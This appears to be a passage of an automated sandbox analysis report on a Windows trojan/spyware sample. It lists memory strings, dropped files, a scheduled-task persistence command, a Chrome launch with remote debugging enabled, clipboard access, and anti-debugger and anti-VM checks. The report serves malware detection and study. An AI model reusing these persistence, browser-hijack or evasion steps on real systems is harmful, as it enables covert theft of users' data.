Source: chrome.exe, 00000004.00000002.2170776678.0000162400C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.2170776678.0000162400C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.2169504950.00001624009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.2152300391.0000162400D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.2168080501.000016240066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore$
Source: chrome.exe, 00000004.00000002.2168149094.00001624006B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.2169702023.0000162400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168991511.0000162400834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169344729.0000162400948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169561753.00001624009F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000002.2168991511.0000162400834000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enyz$
Source: chrome.exe, 00000004.00000003.2153670789.000016240033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169222535.00001624008F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153781552.0000162400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2155376618.0000162400F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2155454916.0000162400D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2152300391.0000162400D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.2178389657.000057200078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2136497703.000057200039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2136272371.0000572000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2178640787.000057200080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.2178389657.000057200078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2136497703.000057200039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2136272371.0000572000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2178640787.000057200080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.2178389657.000057200078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000003.2136816179.0000572000684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2178389657.000057200078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2136497703.000057200039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2136272371.0000572000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2178640787.000057200080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.2165527680.0000162400014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.2170870988.0000162400C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000004.00000003.2132634591.0000772C002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2132616796.0000772C002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165527680.0000162400014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168382751.0000162400731000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2140536869.00001624004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168080501.000016240066C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168211289.00001624006D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.2168352678.000016240071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000004.00000002.2169504950.00001624009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.2169504950.00001624009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000004.00000002.2169842093.0000162400A94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168080501.000016240066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2166654268.0000162400298000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/368855.)
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000004.00000002.2166900541.000016240031C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000004.00000003.2140536869.00001624004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: ELLRGATenShKoyKeRtXA.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary

Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: AD4q0qFvM8.exe Static PE information: section name:
Source: AD4q0qFvM8.exe Static PE information: section name: .idata
Source: AD4q0qFvM8.exe Static PE information: section name:
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 1876
Source: AD4q0qFvM8.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: AD4q0qFvM8.exe Static PE information: Section: biazzcha ZLIB complexity 0.9942603044557918
Source: AD4q0qFvM8.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@16/5
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6708
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2168382751.000016240072C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: AD4q0qFvM8.exe Virustotal: Detection: 69%
Source: AD4q0qFvM8.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\AD4q0qFvM8.exe "C:\Users\user\Desktop\AD4q0qFvM8.exe"
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2404,i,6825449060728649226,8540860588299111,262144 /prefetch:8
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: AD4q0qFvM8.exe Static file information: File size 4480000 > 1048576
Source: AD4q0qFvM8.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: AD4q0qFvM8.exe Static PE information: Raw size of biazzcha is bigger than: 0x100000 < 0x1bec00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D68230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00D68230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: AD4q0qFvM8.exe Static PE information: real checksum: 0x454743 should be: 0x44e655
Source: AD4q0qFvM8.exe Static PE information: section name: biazzcha
Source: AD4q0qFvM8.exe Static PE information: section name: bdvaplrx
Source: AD4q0qFvM8.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: AD4q0qFvM8.exe Static PE information: section name: biazzcha entropy: 7.955559647188732
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB0DE5 second address: EB0DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10AB second address: EB10B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10B1 second address: EB10BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10BA second address: EB10C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDAC110B286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10C4 second address: EB10C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10C8 second address: EB10DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDAC110B286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB10DA second address: EB10DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4047 second address: EB404C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB404C second address: EB40AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDAC0B0C7F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FDAC0B0C821h 0x00000013 pushad 0x00000014 jmp 00007FDAC0B0C808h 0x00000019 jmp 00007FDAC0B0C801h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 jg 00007FDAC0B0C80Bh 0x0000002a jmp 00007FDAC0B0C805h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB40AE second address: EB40C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edi 0x0000000b jbe 00007FDAC110B286h 0x00000011 pop edi 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB40C3 second address: D2FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jnc 00007FDAC0B0C7FEh 0x00000010 pop eax 0x00000011 movzx ecx, di 0x00000014 push dword ptr [ebp+122D002Dh] 0x0000001a jmp 00007FDAC0B0C800h 0x0000001f cmc 0x00000020 call dword ptr [ebp+122D27B1h] 0x00000026 pushad 0x00000027 pushad 0x00000028 mov bh, al 0x0000002a add dword ptr [ebp+122D196Ch], edi 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 jne 00007FDAC0B0C7FEh 0x00000039 jnc 00007FDAC0B0C7F8h 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 xor dword ptr [ebp+122D2EAEh], edx 0x00000049 mov dword ptr [ebp+122D38EFh], eax 0x0000004f mov dword ptr [ebp+122D17FCh], ebx 0x00000055 mov esi, 0000003Ch 0x0000005a cmc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D2EAEh], ebx 0x00000065 lodsw 0x00000067 clc 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c cmc 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 jnl 00007FDAC0B0C808h 0x00000077 nop 0x00000078 jbe 00007FDAC0B0C813h 0x0000007e push eax 0x0000007f je 00007FDAC0B0C804h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB41F2 second address: EB4222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDAC110B298h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jnl 00007FDAC110B286h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4222 second address: EB4227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4227 second address: EB425A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a and edx, 37D232A2h 0x00000010 lea ebx, dword ptr [ebp+12457F99h] 0x00000016 mov esi, dword ptr [ebp+122D2478h] 0x0000001c jg 00007FDAC110B292h 0x00000022 push eax 0x00000023 pushad 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB4462 second address: EB447F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: EB447F second address: EB4484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
